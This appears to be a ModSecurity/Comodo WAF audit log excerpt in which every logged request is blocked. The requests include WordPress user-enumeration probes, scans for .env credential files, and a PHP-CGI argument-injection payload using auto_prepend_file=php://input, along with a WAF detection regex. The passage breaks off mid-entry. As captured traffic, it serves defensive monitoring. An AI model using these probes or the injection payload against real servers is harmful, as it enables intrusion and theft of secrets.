Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747700267533694 3122 (- - -) Stopwatch2: 1747700267533694 3122; combined=1371, p1=529, p2=816, p3=0, p4=0, p5=26, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b36b67e-Z-- --1b6d9f37-A-- [20/May/2025:07:23:57 +0700] aCvLnW2BM6ll8T8hTXtdEgAAAEA 103.236.140.4 38260 103.236.140.4 8181 --1b6d9f37-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.211.13.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.211.13.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1b6d9f37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b6d9f37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747700637636598 3546 (- - -) Stopwatch2: 1747700637636598 3546; combined=1806, p1=564, p2=1214, p3=0, p4=0, p5=28, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b6d9f37-Z-- --c065bd10-A-- [20/May/2025:07:50:50 +0700] aCvR6sXP1sKBAOnOfYMCXAAAAM0 103.236.140.4 36608 103.236.140.4 8181 --c065bd10-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.119.87.58 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.119.87.58 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --c065bd10-C-- --c065bd10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c065bd10-E-- --c065bd10-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747702250568732 6626 (- - -) Stopwatch2: 1747702250568732 6626; combined=4997, p1=487, p2=4477, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c065bd10-Z-- --2389cc62-A-- [20/May/2025:08:30:58 +0700] aCvbUsXP1sKBAOnOfYMMoAAAAM0 103.236.140.4 49056 103.236.140.4 8181 --2389cc62-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.176.138.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.176.138.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2389cc62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2389cc62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747704658025954 2813 (- - -) Stopwatch2: 1747704658025954 2813; combined=1559, p1=518, p2=1011, p3=0, p4=0, p5=30, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2389cc62-Z-- --cd6e2106-A-- [20/May/2025:08:40:36 +0700] aCvdlPjdRvl4szSJA_ZkyAAAAJY 103.236.140.4 60364 103.236.140.4 8181 --cd6e2106-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 207.154.197.113 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 207.154.197.113 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --cd6e2106-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd6e2106-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747705236875196 846 (- - -) Stopwatch2: 1747705236875196 846; combined=360, p1=322, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd6e2106-Z-- --362be06a-A-- [20/May/2025:09:08:03 +0700] aCvkA8XP1sKBAOnOfYMYAwAAAMY 103.236.140.4 36818 103.236.140.4 8181 --362be06a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.110.10.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.110.10.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --362be06a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --362be06a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747706883214359 2576 (- - -) Stopwatch2: 1747706883214359 2576; combined=1210, p1=402, p2=779, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --362be06a-Z-- --2b020554-A-- [20/May/2025:09:31:34 +0700] aCvphm2BM6ll8T8hTXt6kgAAAEo 103.236.140.4 37830 103.236.140.4 8181 --2b020554-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2b020554-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b020554-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747708294752774 709 (- - -) Stopwatch2: 1747708294752774 709; combined=281, p1=249, p2=0, p3=0, p4=0, p5=32, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b020554-Z-- --55183042-A-- [20/May/2025:09:31:42 +0700] aCvpjoKffmi-VC_l8kRJRAAAAA4 103.236.140.4 37956 103.236.140.4 8181 --55183042-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --55183042-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55183042-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747708302698622 837 (- - -) Stopwatch2: 1747708302698622 837; combined=360, p1=323, p2=0, p3=0, p4=0, p5=36, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55183042-Z-- --537be975-A-- [20/May/2025:09:32:37 +0700] aCvpxfjdRvl4szSJA_Z2XAAAAJg 103.236.140.4 38992 103.236.140.4 8181 --537be975-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.162.146.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.162.146.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --537be975-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --537be975-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747708357395326 2956 (- - -) Stopwatch2: 1747708357395326 2956; combined=1434, p1=464, p2=938, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --537be975-Z-- --1efac26e-A-- [20/May/2025:09:56:44 +0700] aCvvbPjdRvl4szSJA_Z63QAAAIY 103.236.140.4 53960 103.236.140.4 8181 --1efac26e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.174.158.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.174.158.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1efac26e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1efac26e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747709804815741 2996 (- - -) Stopwatch2: 1747709804815741 2996; combined=1315, p1=436, p2=849, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1efac26e-Z-- --ef04f621-A-- [20/May/2025:10:20:12 +0700] aCv07PjdRvl4szSJA_Z7HwAAAII 103.236.140.4 54238 103.236.140.4 8181 --ef04f621-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.92.109.116 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.92.109.116 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --ef04f621-C-- --ef04f621-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef04f621-E-- --ef04f621-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747711212686943 5315 (- - -) Stopwatch2: 1747711212686943 5315; combined=3468, p1=567, p2=2866, p3=0, p4=0, p5=35, sr=84, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef04f621-Z-- --1304054c-A-- [20/May/2025:10:28:24 +0700] aCv22PjdRvl4szSJA_Z7NQAAAI4 103.236.140.4 54372 103.236.140.4 8181 --1304054c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 157.230.19.140 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 157.230.19.140 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1304054c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1304054c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747711704073603 901 (- - -) Stopwatch2: 1747711704073603 901; combined=396, p1=361, p2=0, p3=0, p4=0, p5=35, sr=154, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1304054c-Z-- --027e5b56-A-- [20/May/2025:10:34:04 +0700] aCv4LG2BM6ll8T8hTXt9vwAAAFQ 103.236.140.4 54410 103.236.140.4 8181 --027e5b56-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.225.151.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.225.151.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --027e5b56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --027e5b56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747712044092740 3128 (- - -) Stopwatch2: 1747712044092740 3128; combined=1331, p1=466, p2=829, p3=0, p4=0, p5=36, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --027e5b56-Z-- --3fcfb74e-A-- [20/May/2025:10:36:41 +0700] aCv4yfjdRvl4szSJA_Z7PwAAAIY 103.236.140.4 54432 103.236.140.4 8181 --3fcfb74e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 155.93.170.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.93.170.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3fcfb74e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fcfb74e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747712201897845 2378 (- - -) Stopwatch2: 1747712201897845 2378; combined=1291, p1=421, p2=839, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fcfb74e-Z-- --b9717628-A-- [20/May/2025:10:41:34 +0700] aCv57sXP1sKBAOnOfYMnMgAAANY 103.236.140.4 54514 103.236.140.4 8181 --b9717628-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 209.124.107.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 209.124.107.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b9717628-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9717628-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747712494464074 2860 (- - -) Stopwatch2: 1747712494464074 2860; combined=1303, p1=443, p2=829, p3=0, p4=0, p5=30, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9717628-Z-- --2e149241-A-- [20/May/2025:10:43:16 +0700] aCv6VIKffmi-VC_l8kRM1gAAABg 103.236.140.4 54534 103.236.140.4 8181 --2e149241-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.157.214 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.157.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --2e149241-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e149241-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747712596886487 773 (- - -) Stopwatch2: 1747712596886487 773; combined=312, p1=272, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e149241-Z-- --d4715048-A-- [20/May/2025:12:53:57 +0700] aCwY9W2BM6ll8T8hTXuBLwAAAEk 103.236.140.4 34786 103.236.140.4 8181 --d4715048-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 161.97.153.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 161.97.153.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; MI 5X Build/OPM1.171019.019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36 Accept-Charset: utf-8 --d4715048-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4715048-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747720437098265 850 (- - -) Stopwatch2: 1747720437098265 850; combined=314, p1=273, p2=0, p3=0, p4=0, p5=40, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4715048-Z-- --987fb833-A-- [20/May/2025:12:58:09 +0700] aCwZ8W2BM6ll8T8hTXuBNAAAAFM 103.236.140.4 34804 103.236.140.4 8181 --987fb833-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3889.0 Safari/537.36 Accept-Charset: utf-8 --987fb833-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --987fb833-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747720689208831 803 (- - -) Stopwatch2: 1747720689208831 803; combined=331, p1=292, p2=0, p3=0, p4=0, p5=39, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --987fb833-Z-- --99df8134-A-- [20/May/2025:13:00:13 +0700] aCwabW2BM6ll8T8hTXuBOgAAAEE 103.236.140.4 34826 103.236.140.4 8181 --99df8134-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 168.253.0.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: 